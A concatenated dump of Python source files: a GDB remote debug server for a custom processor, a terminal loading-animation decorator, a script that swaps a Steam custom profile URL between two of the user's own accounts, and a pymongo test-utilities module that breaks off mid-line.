wait_for_context(self, timeout=None, first_ch=None, interruptible=False): idx = 0 max_core_id = -1 while not self._cores_num or idx < self._cores_num: # Read first character if first_ch: ch = first_ch first_ch = None else: ch = self._read(timeout=timeout, interruptible=interruptible) if not ch: # Timeout or interrupt if idx > 0: if not self._cores_num: # Timeout was expected - now we know number of cores self._cores_num = max_core_id + 1 logging.info('Number of cores: %d', self._cores_num) break else: logging.warning('Timeout when reading context') else: logging.debug('Timeout when waiting for context') return False if ch != b'~': logging.warning('Expected \'~\' from CPU, got \'%s\' (0x%X)', binascii.b2a_qp(ch), ord(ch or b'\0')) continue core_id, ctx = self._read_core_context() self._core_ctx[core_id] = ctx max_core_id = max(max_core_id, core_id) idx += 1 # Change timeout for next cores timeout = 0.1 interruptible = False return True def break_for_context(self): # check if there is any data available logging.debug('Checking if context was already sent') if self.wait_for_context(0.1): logging.debug('Got context before sending break') return # check if processor is running logging.debug('Checking processor state') self._write(b'B') ch = self._read(timeout=1) if not ch: # fallback to old method if 'B' is not supported self._write(b's') ch = self._read(timeout=1) if ch == ACK_CHR or not ch: # ACK after 'B' or timeout after 's' - processor is running logging.debug('Processor is running - halting') self._write(b'b') ch = None logging.debug('Processor is halted - read context data') self.wait_for_context(None, ch) def _setup_burst_mode(self, addr, length): # Burst mode makes sense only if auto-increment is enabled if not self._auto_inc: return # Check if burst mode is already active if self._burst_len != 0: return # Calculate actual burst length and check if it is bigger than one word next_reg_addr = addr - addr % MEM_REGION_ALIGNMENT + MEM_REGION_ALIGNMENT burst_len = min(length, MAX_BURST_LEN, next_reg_addr - addr) if burst_len <= 4: return # Seek to burst count register burst_len_bin = struct.pack('>I', burst_len) self.set_addr(DEBUG_BURST_COUNT) # Write burst length into the register self.write_mem_word(burst_len_bin) # Remember burst length for later - it will be decremented when reading/writing words self._burst_len = burst_len # Burst is considered started after first command (e.g. 'm') is sent to the debug chip self._burst_started = False logging.debug('Enabled burst mode (addr 0x%X, length %d)', addr, burst_len) class DbgBridge: """Handles GDB Remote Protocol commands and convert them to CC Processor Debugger commands.""" def __init__(self, gdb_conn, cpu_dbg): self._gdb_conn = gdb_conn self._cpu_dbg = cpu_dbg self._breakpoints = [None] * BREAKPOINTS_NUM self._watchpoints = [None] * WATCHPOINTS_NUM # use SIGTRAP by default; GDB expects it after 'step' command self._sig = SIGTRAP self._gdb_sync = False def cmd_read_regs(self): logging.info('Reading registers...') gregs = self._cpu_dbg.read_regs() pc = self._cpu_dbg.get_pc_reg() or 0 status = self._cpu_dbg.read_mem(0x3003000, 4) #epc = self._cpu_dbg.read_mem(0x3003004, 4) # current PC is more useful cause = self._cpu_dbg.read_mem(0x3003008, 4) badaddr = self._cpu_dbg.read_mem(0x300300C, 4) if not gregs or not status or not cause or not badaddr: logging.error('Failed to read registers') return b'E01' regs_hex = b'' regs_hex += binascii.hexlify(gregs) regs_hex += binascii.hexlify(status) regs_hex += b'00000000' * 2 # lo, hi regs_hex += binascii.hexlify(badaddr) regs_hex += binascii.hexlify(cause) regs_hex += '{0:08X}'.format(pc).encode('ascii') regs_hex += b'00000000' * 32 # floating point registers regs_hex += b'00000000' * 2 # fsr, fir registers return regs_hex def cmd_write_regs(self, arg): regs = binascii.unhexlify(arg) gregs = regs[:32*4] pc_bin = regs[(32+5)*4:(32+6)*4] pc, = struct.unpack('>I', pc_bin) if pc == 0: # GDB wants to restart program - reset processor logging.info('Resetting processor...') self._cpu_dbg.reset_cpu() self._cpu_dbg.break_cpu() self._cpu_dbg.wait_for_context() return b'OK' else: logging.info('Writing registers...') # Note: pc cannot be changed in processor yet if self._cpu_dbg.write_regs(gregs): return b'OK' else: logging.error('Failed to write registers') return b'E01' def cmd_read_mem(self, arg): i = arg.index(b',') addr = int(arg[:i], 16) length = int(arg[i+1:], 16) if length == 0: return '' data = self._cpu_dbg.read_mem(addr, length) if not data: return b'E01' data_hex = binascii.hexlify(data) logging.info('Read %d bytes from 0x%08X: %s', length, addr, data_hex) return data_hex def cmd_write_mem(self, arg): i = arg.index(b',') j = arg.index(b':') addr = int(arg[:i], 16) length = int(arg[i+1:j], 16) data_hex = arg[j+1:] data = binascii.unhexlify(data_hex) if length == 0: return '' if len(data) != length: logging.error('Invalid length field in write_mem command') logging.info('Wrote %d bytes at 0x%08X: %s', length, addr, data_hex) if self._cpu_dbg.write_mem(addr, data): return b'OK' else: return b'E01' def cmd_write_mem_bin(self, arg): i = arg.index(b',') j = arg.index(b':') addr = int(arg[:i], 16) length = int(arg[i+1:j], 16) data = arg[j+1:] if len(data) != length: logging.error('Invalid length field in write_mem_bin command %d %d', len(data), length) logging.info('Writing %d bytes at 0x%08X: %s', len(data), addr, binascii.hexlify(data)) if self._cpu_dbg.write_mem(addr, data): if len(data) > 1024: logging.info('Writing operation finished!') return b'OK' else: return b'E01' def cmd_insert_breakpoint(self, arg): args = arg.split(b',') t = args[0] addr = int(args[1], 16) length = int(args[2], 16) logging.info('Inserting breakpoint: type %s addr 0x%08X len %d', t, addr, length) found = False success = False if t in [b'0', b'1']: # software/hardware breakpoint for i in range(0, BREAKPOINTS_NUM): if self._breakpoints[i] is None: found = True success = self._cpu_dbg.set_breakpoint(i, addr) if success: self._breakpoints[i] = addr break elif t in [b'2', b'3', b'4']: # watchpoint (write, read, access) for i in range(0, WATCHPOINTS_NUM): if self._watchpoints[i] is None: found = True success = self._cpu_dbg.set_watchpoint(i, addr) if success: self._watchpoints[i] = addr break else: logging.error('Unsupported breakpoint type %s!', t) return '' if success: return b'OK' elif not found: logging.warning('Empty slot for breakpoint not found') else: logging.error('Failed to set breakpoint') return b'E01' def cmd_remove_breakpoint(self, arg): args = arg.split(b',') t = args[0] addr = int(args[1], 16) length = int(args[2], 16) logging.info('Removing breakpoint: type %s addr 0x%08X len %d', t, addr, length) found = False success = False if t in [b'0', b'1']: # software/hardware breakpoint for i in range(0, BREAKPOINTS_NUM): if self._breakpoints[i] == addr: found = True success = self._cpu_dbg.set_breakpoint(i, 0xFFFFFFFF) if success: self._breakpoints[i] = None break elif t in [b'2', b'3', b'4']: # watchpoint (write, read, access) for i in range(0, WATCHPOINTS_NUM): if self._watchpoints[i] == addr: found = True success = self._cpu_dbg.set_watchpoint(i, 0xFFFFFFFF) if success: self._watchpoints[i] = None break else: logging.error('Unsupported breakpoint type %s!', t) return b'' if success: return b'OK' elif not found: logging.error('Breakpoint not found') else: logging.error('Failed to remove breakpoint') return b'E01' def cmd_continue(self, arg): if len(arg) != 0: logging.warning('Ignoring continue address!') logging.info('Continue...') self._cpu_dbg.free_run() def cmd_step(self, arg): if len(arg) != 0: logging.warning('Ignoring step address!') logging.info('Step') self._cpu_dbg.step() def cmd_detach(self): logging.info('GDB detached.') self._cpu_dbg.free_run() return b'OK' def cmd_remote_command(self, arg): cmd = binascii.unhexlify(arg) logging.info('Remote command: %s', cmd) if cmd == b'reset halt': old_bp = self._cpu_dbg.get_breakpoint(0) # Stop as early as possible (address 0) self._cpu_dbg.set_breakpoint(0, 0) self._cpu_dbg.reset_cpu() self._cpu_dbg.break_cpu() self._cpu_dbg.wait_for_context() self._cpu_dbg.set_breakpoint(0, old_bp if old_bp else 0xFFFFFFFF) self.select_best_core() return b'OK' elif cmd == b'reset run': self._cpu_dbg.reset_cpu() return b'OK' elif cmd.startswith(b'delay '): ms = int(cmd[6:]) time.sleep(ms / 1000) return b'OK' elif cmd == b'halt': self._cpu_dbg.break_cpu() self._cpu_dbg.wait_for_context() self.select_best_core() return b'OK' elif cmd.startswith(b'core '): core_id = int(cmd[5:]) logging.info('Changing core to %d', core_id) self._cpu_dbg.set_core(core_id) return b'OK' elif cmd == b'gdb_sync': # Fake next stepi command so it does not step but return current address # This is useful to sync GDB state after monitor halt command self._gdb_sync = True return b'OK' logging.warn('Unknown command: %s', cmd) return b'' def get_exception_info(self): # Note: T packet allows GDB for not reading all registers repl = 'T{0:02X}'.format(self._sig) # GDP frequently needs SP, FP, RA and PC registers logging.debug('Reading registers...') for idx in [29, 30, 31]: reg_bin = self._cpu_dbg.read_reg(idx) reg, = struct.unpack('>I', reg_bin) repl += '{0:02X}:{1:08X};'.format(idx, reg) pc = self._cpu_dbg.get_pc_reg() or 0 repl += '{0:02X}:{1:08X};'.format(37, pc) # PC repl += 'thread:{0:08X};'.format(self._cpu_dbg.get_core() + 1) # current core return repl.encode('ascii') def find_best_core(self, hint): best_core_id = hint # check if any core is halted on breakpoint for core_id in self._cpu_dbg.get_active_cores(): ctx = self._cpu_dbg.get_core_ctx(core_id) if not ctx: continue if ctx['instr'] == BREAK_OPCODE: best_core_id = core_id logging.debug('Break instruction detected!') elif ctx['addr'] in self._breakpoints: best_core_id = core_id logging.debug('Halted on hw breakpoint!') elif not self._cpu_dbg.is_core_active(best_core_id): # if current core is halted, switch to first active best_core_id = core_id # if no core is running, use 0 if not self._cpu_dbg.is_core_active(best_core_id): best_core_id = 0 return best_core_id def select_best_core(self): best_core_id = self.find_best_core(self._cpu_dbg.get_core()) if best_core_id != self._cpu_dbg.get_core(): logging.info('Selecting best core %d', best_core_id) self._cpu_dbg.set_core(best_core_id) def setup_debugger(self): if not self._setup_done: # Initial setup logging.info('Initializing debugger') self._cpu_dbg.set_auto_inc(True) # Setup breakpoints and watchpoints to address which cannot be accessed # Note: reset_debugger() is not used because it unbreaks processor for i in range(0, BREAKPOINTS_NUM): self._cpu_dbg.set_breakpoint(i, 0xFFFFFFFF) for i in range(0, WATCHPOINTS_NUM): self._cpu_dbg.set_watchpoint(i, 0xFFFFFFFF) # Select core best_core_id = self.find_best_core(0) self._cpu_dbg.set_core(best_core_id) self._setup_done = True logging.debug('Initialized.') def handle_gdb_packet(self, data): logging.debug('Handling GDB packet: %s', data) repl = b'' exit = False cmd = data[0:1] arg = data[1:] if cmd == b'?': # last exception number self._cpu_dbg.break_for_context() self.setup_debugger() repl = self.get_exception_info() elif cmd == b'c': # cAA..AA: Continue at address AA..AA(optional) self.cmd_continue(arg) self.wait_for_exception() repl = self.get_exception_info() elif cmd == b's': # Step one instruction from AA..AA(optional) if self._gdb_sync: self._gdb_sync = False else: self.cmd_step(arg) self.wait_for_exception() repl = self.get_exception_info() elif cmd == b'g': # return the value of the CPU registers repl = self.cmd_read_regs() elif cmd == b'G': # set the value of the CPU registers - return OK repl = self.cmd_write_regs(arg) elif cmd == b'm': # mAA..AA,LLLL: Read LLLL bytes at address AA..AA repl = self.cmd_read_mem(arg) elif cmd == b'M': # MAA..AA,LLLL: Write LLLL bytes at address AA.AA return OK repl = self.cmd_write_mem(arg) elif cmd == b'X': # XAA..AA,LLLL: Write LLLL bytes at address AA.AA return OK repl = self.cmd_write_mem_bin(arg) elif cmd == b'Z': # insert breakpoint repl = self.cmd_insert_breakpoint(arg) elif cmd == b'z': # remove breakpoint repl = self.cmd_remove_breakpoint(arg) elif cmd == b'D': # detach repl = self.cmd_detach() exit = True elif cmd == b'q': args = re.split(b'[,:]', arg) if args[0] == b'Rcmd': # monitor command repl = self.cmd_remote_command(args[1]) elif args[0] == b'Supported': repl = b'PacketSize=1400;QStartNoAckMode+' elif args[0] == b'Offsets': repl = b'Text=0;Data=0;Bss=0' elif args[0] == b'C': # current thread # Note: GDB thread IDs starts from 1 core_id = self._cpu_dbg.get_core() repl = b'QC{0}'.format(core_id + 1) elif args[0] == b'Symbol': repl = b'OK' # no symbol is needed elif args[0] == b'Attached': repl = b'1' # attached to device (no process has been created) elif args[0] == b'fThreadInfo': cores = self._cpu_dbg.get_active_cores() repl = b'm' + b','.join([str(i+1).encode('ascii') for i in cores]) logging.info('Returning thread list: %s', repl) elif args[0] == b'sThreadInfo': repl = b'l' # end of list elif args[0] == b'ThreadExtraInfo': thread_id = int(args[1]) repl = binascii.hexlify('core {0}'.format(thread_id - 1).encode('ascii')) else: logging.warning('Unknown GDB packet: %s', data) elif cmd == b'Q': # set args = re.split(b'[,:]', arg) if args[0] == b'StartNoAckMode': logging.debug('Starting no-ack mode') self._gdb_conn.start_no_ack_mode() repl = b'OK' else: logging.warning('Unknown GDB packet: %s', data) elif cmd == b'H': # set thread op = arg[0] thread_id = int(arg[1:]) if thread_id in [-1, 0]: # all cores - ignore repl = b'OK' else: core_id = thread_id - 1 if self._cpu_dbg.is_core_active(core_id): self._cpu_dbg.set_core(core_id) logging.info('GDB changed core to %d (op %s)', core_id, op) repl = b'OK' else: logging.warning('Invalid thread ID in %s', data) repl = b'E01' elif cmd == b'T': # check if thread is alive core_id = int(arg) - 1 active = self._cpu_dbg.is_core_active(core_id) repl = b'OK' if active else b'E01' else: logging.warning('Unknown GDB packet: %s', data) # Send reply logging.debug('Handled GDB packet %s - reply %s', data, repl) self._gdb_conn.send_packet(repl) return not exit def wait_for_exception(self): logging.info('Waiting for exception...') interruptible = True self._sig = SIGTRAP while True: logging.debug('Waiting for context...') try: if self._cpu_dbg.wait_for_context(interruptible=interruptible): break except DebuggerInterruptedException: logging.info('Interrupted...') interruptible = False self._sig = SIGINT self._cpu_dbg.break_cpu() logging.info('CPU stopped') self.select_best_core() def run(self): self._setup_done = False self._cpu_dbg.break_cpu() while True: try: data = self._gdb_conn.get_packet() if not data: logging.debug('Got no packet') return if not self.handle_gdb_packet(data): logging.info('Detaching') return except DebuggerDisconnectedException: logging.info('Debugger disconnected') return except TargetDisconnectedException: logging.info('Target disconnected') return class GdbLoggingHandler(logging.Handler): def __init__(self, gdb_conn): logging.Handler.__init__(self) self._gdb_conn = gdb_conn def emit(self, record): log_entry = self.format(record) self._gdb_conn.send_packet(b'O ' + log_entry.encode('utf-8')) class PipePair(): def __init__(self, read_pipe_name, write_pipe_name): # Note: server connects read pipe first so use reversed order here self._write_pipe = open(write_pipe_name, 'wb', buffering=0) if os.name == 'nt': # On Windows client cannot open pipe until server calls ConnectNamedPipe. # Simulator uses two pipes and it calls ConnectNamedPipe synchronously so we have to wait util second pipe is available. # In C app WaitNamedPipe should be used. Standard Python does not have API for that so wait 100ms instead. time.sleep(0.1) self._read_pipe = open(read_pipe_name, 'rb', buffering=0) def write(self, *args, **kwargs): res = self._write_pipe.write(*args, **kwargs) return res def read(self, *args, **kwargs): res = self._read_pipe.read(*args, **kwargs) return res def close(self): self._read_pipe.close() self._write_pipe.close() class Options: def __init__(self): self.gdb_port = GDB_PORT self.unix_socket = None self.dbg_port = DBG_PORT self.dbg_baudrate = DBG_BAUDRATE self.log_level = logging.INFO self.log_filename = None self.debug_proto_log_path = None self.mcu_name = 'ml605' self.pipe = False def _show_help(self): print('Usage: dbgserver.py [OPTIONS]\n') print('Options:') print(' -p, --port=DBG_PORT path to debug port device') print(' (default: {0})'.format(DBG_PORT)) print(' -b, --baudrate=BAUDRATE debug port baudrate (default: {0})'.format(DBG_BAUDRATE)) print(' -g, --gdbport=TCP_PORT listen on TCP port for GDB connection') print(' (default: {0})'.format(GDB_PORT)) print(' -u, --unix-socket=FILE use Unix domain socket for GDB connection') print(' --pipe use standard streams for GDB connection') print(' -l, --log=LEVEL logging level - one of: DEBUG, INFO (default),') print(' WARNING, ERROR, CRITICAL') print(' -o, --log-file=FILE log to FILE') print(' --debug-proto-log=FILE log debug proto to FILE (slow)') print(' --mcu=ml605|ccnv1 enable compatibility with mcu') def parse(self, argv): opts, args = getopt.getopt(argv, 'hp:b:g:u:l:o:', ['help', 'port=', 'baudrate=', 'gdbport=', 'unix-socket=', 'log=', 'log-file=', 'debug-proto-log=', 'mcu=', 'pipe']) for opt, arg in opts: if opt in ('-h', '--help'): self._show_help() sys.exit(0) elif opt in ('-p', '--port'): self.dbg_port = arg elif opt in ('-b', '--baudrate'): self.dbg_baudrate = int(arg) elif opt in ('-g', '--gdbport'): self.gdb_port = int(arg) elif opt in ('-u', '--unix-socket'): self.unix_socket = arg elif opt in ('--pipe'): self.pipe = True elif opt in ('-l', '--log'): self.log_level = getattr(logging, arg.upper()) if not isinstance(self.log_level, int): raise ValueError('Invalid log level: %s' % arg) elif opt in ('-o', '--log-file'): self.log_filename = arg elif opt in ('--debug-proto-log'): self.debug_proto_log_path = arg elif opt in ('--mcu'): if arg not in ('ml605', 'ccnv1'): raise ValueError('Invalid mcu name: %s' % arg) self.mcu_name = arg def create_socket_for_gdb(opts): # Setup socket for GDB connection if opts.pipe: return None elif not opts.unix_socket: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind(('', opts.gdb_port)) logging.info('Listening on TCP port %d...', opts.gdb_port) else: if os.path.exists(opts.unix_socket): st = os.stat(opts.unix_socket) if st and stat.S_ISSOCK(st.st_mode): os.unlink(opts.unix_socket) sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) sock.bind(opts.unix_socket) logging.info('Listening on unix socket %s...', opts.unix_socket) if not opts.pipe: sock.listen(5) return sock def create_dbg_stream(opts): # Check if dbg_port is valid if opts.debug_proto_log_path: logging.warning('Logging debug protocol may slow down the debug server!') if opts.dbg_port.startswith('pipe:'): dbg_pipe_name = opts.dbg_port.split(':')[1] logging.debug('Connecting to debug pipe...') pipe_name_prefix = '\\\\.\\pipe\\' if os.name == 'nt' else '' read_pipe_name = pipe_name_prefix + dbg_pipe_name + '.out' write_pipe_name = pipe_name_prefix + dbg_pipe_name + '.in' dbg_stream = PipePair(read_pipe_name, write_pipe_name) logging.info('Connected to debug pipe %s', dbg_pipe_name) else: # HACK: On Linux if dsrdtr is disabled pyserial always does TIOCMBIS ioctl to set DTR which fails for socat # created devices. Enabled dsrdtr seems to not harm communication with real hardware. # On Windows enabled dsrdtr breaks debugging real hardware so it needs to be disabled there. dsrdtr = (os.name != 'nt') # Note: pyserial doesnt detect port closing when reading data from another thread without timeout dbg_stream = serial.Serial(port=opts.dbg_port, baudrate=opts.dbg_baudrate, rtscts=False, dsrdtr=dsrdtr) logging.info('Connected to debug port %s (baudrate %d)', opts.dbg_port, opts.dbg_baudrate) dbg_stream = StreamLoggingWrapper(dbg_stream, opts.debug_proto_log_path) return dbg_stream def main(argv): # Parse command line arguments opts = Options() opts.parse(argv) if opts.pipe: # Ignore SIGINT in pipe mode signal.signal(signal.SIGINT, signal.SIG_IGN) # Setup logging #logging.basicConfig(level=log_level, format='%(levelname)s: %(message)s', filename=log_filename, filemode='w') logging.srcfile = None logging.logThreads = 0 logging.logProcesses = 0 logging.getLogger().setLevel(opts.log_level) formatter = logging.Formatter('%(levelname)s: %(message)s') ch = logging.StreamHandler() # uses stderr ch.setFormatter(formatter) if opts.pipe: ch.setLevel(logging.ERROR) logging.getLogger().addHandler(ch) if opts.log_filename: fh = logging.FileHandler(opts.log_filename) fh.setFormatter(formatter) logging.getLogger().addHandler(fh) # Install exception handler # Note: it does not work in threads: https://bugs.python.org/issue1230540 def exception_handler(exc_type, exc_value, exc_traceback): if issubclass(exc_type, KeyboardInterrupt): sys.__excepthook__(exc_type, exc_value, exc_traceback) return logging.critical('Uncaught exception', exc_info=(exc_type, exc_value, exc_traceback)) sys.excepthook = exception_handler sock = create_socket_for_gdb(opts) dbg_stream = create_dbg_stream(opts) cpu_dbg = CpuDebug(dbg_stream, opts.mcu_name) try: while True: if not opts.pipe: logging.info('Waiting for GDB client...') client, addr = sock.accept() # GDB client connected logging.info('GDB client connected: %s', addr) else: client = None gdb_conn = GdbConn(client, cpu_dbg.get_input_thread()) bridge = DbgBridge(gdb_conn, cpu_dbg) if opts.pipe and False: gdb_handler = GdbLoggingHandler(gdb_conn) logging.getLogger().addHandler(gdb_handler) try: bridge.run() except serial.SerialException as e: logging.exception('Serial exception') except socket.error as e: logging.exception('Socket error') if client: client.close() logging.info('GDB client disconnected.') if opts.pipe: break except KeyboardInterrupt: logging.info('Exiting...') logging.debug('Closing debug stream...') cpu_dbg.get_input_thread().closing = True if os.name == 'nt' and opts.dbg_port.startswith('pipe:'): # HACK: On Windows closing pipe does not interrupt read request on a pipe. # To workaround it send a basic command to MCU to make it respond with something and wake up # the input thread. dbg_stream.write(b'I') try: dbg_stream.close() except Exception as e: logging.warn('Exception when closing debug stream: %s', e) logging.debug('Closed debug stream.') if opts.unix_socket: os.unlink(opts.unix_socket) if opts.pipe: # Wait a moment so GDB has chance to read last packets. Not sleeping causes GDB error on Windows. time.sleep(0.1) logging.debug('Exiting from main thread') if __name__ == '__main__': main(sys.argv[1:])
__init__.py
import threading import time from functools import wraps from trashguy import TrashGuy class Anim: def __init__(self, text: str = 'Loading', speed: int = 0.2): self.text: str = text self.speed: int = speed self.thread: threading.Thread = threading.Thread() self.trash_anim: TrashGuy = TrashGuy(self.text) self.frame_list: list = list(self.trash_anim) self.animate: bool = True def _start(self): for frame in self.frame_list: if self.animate: print(frame, end='', flush=True) time.sleep(self.speed) print(f'\x1b[1K\x1b[{len(frame) ** 2}D', end='') self.frame_list.pop(0) else: continue return def _get_last_frame(self): return self.frame_list[0] if len(self.frame_list) != 0 else [] def start(self): self.thread = threading.Thread(target=self._start) self.thread.start() return def stop(self): self.animate = False return def animate(text: str = 'LOADING', speed: int = 0.02): """Decorator for adding trashguy animation to long running functions. Args: text (str): String reference to trash items speed (float): Number of seconds each cycle of animation. Examples: import trash_anim @trash.anim.animate(text='LOADING', speed=1) def test(): import time time.sleep(10) print('\nDone') """ def decorator(func): @wraps(func) def wrapper(*args, **kwargs): anim = Anim(text=text, speed=speed) anim.start() try: ret = func(*args, **kwargs) finally: anim.stop() return ret return wrapper return decorator
claim.py
import ast import json import logging import os import random import sys import time import requests from steamapi import SteamCommunity from threading import Thread from functools import wraps def run_async(func): @wraps(func) def async_func(*args, **kwargs): func_hl = Thread(target = func, args = args, kwargs = kwargs) func_hl.start() return func_hl return async_func logging.basicConfig(level=getattr(logging, "INFO"), format="%(msecs)03d MS - %(message)s", datefmt="%H:%M:%S %p") log = logging.getLogger(__name__) USER_AGENT = "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Mobile Safari/537.36" USERNAME = input("Steam Username (account releasing /id/): ") PASSWORD = input("Steam Password (account releasing /id/): ") release_account = SteamCommunity(username=USERNAME, password=PASSWORD, user_agent=USER_AGENT) print("\n") CLAIM_ACCOUNT_USERNAME = input("Steam Username (account claiming /id/): ") CLAIM_ACCOUNT_PASSWORD = input("Steam Password (account claiming /id/): ") claim_account = SteamCommunity(username=CLAIM_ACCOUNT_USERNAME, password=CLAIM_ACCOUNT_PASSWORD, user_agent=USER_AGENT) vanity_url = release_account.vanity_url release_id_url = f"https://steamcommunity.com/profiles/{release_account.steamid64}/edit?sessionID={release_account.sessionid}&type=profileSave&customURL=" claim_id_url = f"https://steamcommunity.com/profiles/{claim_account.steamid64}/edit?sessionID={claim_account.sessionid}&type=profileSave&customURL={vanity_url}" log.info(f"The Vanity URL that will be swapped is /id/{vanity_url} from {release_account.steamid64} to {claim_account.steamid64}") confirmation = input("Confirm (y/n): ") if confirmation.lower().startswith("y"): log.info("Swapping in 3 seconds...") else: log.info("Exiting script...") quit() for i in range(3, 0, -1): print(str(i) + "...", end="\r") time.sleep(1) grabbed = False @run_async def func1(sleep): global grabbed time.sleep(sleep) log.info(f"Attempting to claim {vanity_url} - {sleep} sleep version") if f"/id/{vanity_url}" in claim_account._session.get(claim_id_url).text: if grabbed is False: grabbed = True log.info(f"{sleep} sleep version grabbed it!") func1(sleep=0.700) func1(sleep=0.540) func1(sleep=0.480) func1(sleep=0.430) func1(sleep=0.375) func1(sleep=0.325) func1(sleep=0.275) func1(sleep=0.220) func1(sleep=0.175) func1(sleep=0.125) log.info(f"Releasing /id/{vanity_url}") release_account._session.get(release_id_url) log.info(f"Released /id/{vanity_url}") if claim_account.vanity_url == vanity_url: log.info(f"Successfully swapped /id/{vanity_url} from {release_account.steamid64} to {claim_account.steamid64}") else: log.info(f"Failed to swap /id/{vanity_url}") quit()
utils.py
# Copyright 2012-present MongoDB, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Utilities for testing pymongo """ import collections import contextlib import functools import os import re import sys import threading import time import warnings from collections import defaultdict from functools import partial from bson import json_util, py3compat from bson.objectid import ObjectId from pymongo import (MongoClient, monitoring) from pymongo.errors import ConfigurationError, OperationFailure from pymongo.monitoring import _SENSITIVE_COMMANDS, ConnectionPoolListener from pymongo.read_concern import ReadConcern from pymongo.read_preferences import ReadPreference from pymongo.server_selectors import (any_server_selector, writable_server_selector) from pymongo.write_concern import WriteConcern from test import (client_context, db_user, db_pwd) from test.utils_selection_tests import parse_read_preference IMPOSSIBLE_WRITE_CONCERN = WriteConcern(w=1000) class WhiteListEventListener(monitoring.CommandListener): def __init__(self, *commands): self.commands = set(commands) self.results = defaultdict(list) def started(self, event): if event.command_name in self.commands: self.results['started'].append(event) def succeeded(self, event): if event.command_name in self.commands: self.results['succeeded'].append(event) def failed(self, event): if event.command_name in self.commands: self.results['failed'].append(event) class CMAPListener(ConnectionPoolListener): def __init__(self): self.events = [] def reset(self): self.events = [] def add_event(self, event): self.events.append(event) def event_count(self, event_type): return len([event for event in self.events[:] if isinstance(event, event_type)]) def connection_created(self, event): self.add_event(event) def connection_ready(self, event): self.add_event(event) def connection_closed(self, event): self.add_event(event) def connection_check_out_started(self, event): self.add_event(event) def connection_check_out_failed(self, event): self.add_event(event) def connection_checked_out(self, event): self.add_event(event) def connection_checked_in(self, event): self.add_event(event) def pool_created(self, event): self.add_event(event) def pool_cleared(self, event): self.add_event(event) def pool_closed(self, event): self.add_event(event) class EventListener(monitoring.CommandListener): def __init__(self): self.results = defaultdict(list) def started(self, event): self.results['started'].append(event) def succeeded(self, event): self.results['succeeded'].append(event) def failed(self, event): self.results['failed'].append(event) def started_command_names(self): """Return list of command names started.""" return [event.command_name for event in self.results['started']] def reset(self): """Reset the state of this listener.""" self.results.clear() class OvertCommandListener(EventListener): """A CommandListener that ignores sensitive commands.""" def started(self, event): if event.command_name.lower() not in _SENSITIVE_COMMANDS: super(OvertCommandListener, self).started(event) def succeeded(self, event): if event.command_name.lower() not in _SENSITIVE_COMMANDS: super(OvertCommandListener, self).succeeded(event) def failed(self, event): if event.command_name.lower() not in _SENSITIVE_COMMANDS: super(OvertCommandListener, self).failed(event) class ServerAndTopologyEventListener(monitoring.ServerListener, monitoring.TopologyListener): """Listens to all events.""" def __init__(self): self.results = [] def opened(self, event): self.results.append(event) def description_changed(self, event): self.results.append(event) def closed(self, event): self.results.append(event) class HeartbeatEventListener(monitoring.ServerHeartbeatListener): """Listens to only server heartbeat events.""" def __init__(self): self.results = [] def started(self, event): self.results.append(event) def succeeded(self, event): self.results.append(event) def failed(self, event): self.results.append(event) class ScenarioDict(dict): """Dict that returns {} for any unknown key, recursively.""" def __init__(self, data): def convert(v): if isinstance(v, collections.Mapping): return ScenarioDict(v) if isinstance(v, (py3compat.string_type, bytes)): return v if isinstance(v, collections.Sequence): return [convert(item) for item in v] return v dict.__init__(self, [(k, convert(v)) for k, v in data.items()]) def __getitem__(self, item): try: return dict.__getitem__(self, item) except KeyError: # Unlike a defaultdict, don't set the key, just return a dict. return ScenarioDict({}) class CompareType(object): """Class that compares equal to any object of the given type.""" def __init__(self, type): self.type = type def __eq__(self, other): return isinstance(other, self.type) def __ne__(self, other): """Needed for Python 2.""" return not self.__eq__(other) class FunctionCallRecorder(object): """Utility class to wrap a callable and record its invocations.""" def __init__(self, function): self._function = function self._call_list = [] def __call__(self, *args, **kwargs): self._call_list.append((args, kwargs)) return self._function(*args, **kwargs) def reset(self): """Wipes the call list.""" self._call_list = [] def call_list(self): """Returns a copy of the call list.""" return self._call_list[:] @property def call_count(self): """Returns the number of times the function has been called.""" return len(self._call_list) class TestCreator(object): """Class to create test cases from specifications.""" def __init__(self, create_test, test_class, test_path): """Create a TestCreator object. :Parameters: - `create_test`: callback that returns a test case. The callback must accept the following arguments - a dictionary containing the entire test specification (the `scenario_def`), a dictionary containing the specification for which the test case will be generated (the `test_def`). - `test_class`: the unittest.TestCase class in which to create the test case. - `test_path`: path to the directory containing the JSON files with the test specifications. """ self._create_test = create_test self._test_class = test_class self.test_path = test_path def _ensure_min_max_server_version(self, scenario_def, method): """Test modifier that enforces a version range for the server on a test case.""" if 'minServerVersion' in scenario_def: min_ver = tuple( int(elt) for elt in scenario_def['minServerVersion'].split('.')) if min_ver is not None: method = client_context.require_version_min(*min_ver)(method) if 'maxServerVersion' in scenario_def: max_ver = tuple( int(elt) for elt in scenario_def['maxServerVersion'].split('.')) if max_ver is not None: method = client_context.require_version_max(*max_ver)(method) return method @staticmethod def valid_topology(run_on_req): return client_context.is_topology_type( run_on_req.get('topology', ['single', 'replicaset', 'sharded'])) @staticmethod def min_server_version(run_on_req): version = run_on_req.get('minServerVersion') if version: min_ver = tuple(int(elt) for elt in version.split('.')) return client_context.version >= min_ver return True @staticmethod def max_server_version(run_on_req): version = run_on_req.get('maxServerVersion') if version: max_ver = tuple(int(elt) for elt in version.split('.')) return client_context.version <= max_ver return True def should_run_on(self, scenario_def): run_on = scenario_def.get('runOn', []) if not run_on: # Always run these tests. return True for req in run_on: if (self.valid_topology(req) and self.min_server_version(req) and self.max_server_version(req)): return True return False def ensure_run_on(self, scenario_def, method): """Test modifier that enforces a 'runOn' on a test case.""" return client_context._require( lambda: self.should_run_on(scenario_def), "runOn not satisfied", method) def tests(self, scenario_def): """Allow CMAP spec test to override the location of test.""" return scenario_def['tests'] def create_tests(self): for dirpath, _, filenames in os.walk(self.test_path): dirname = 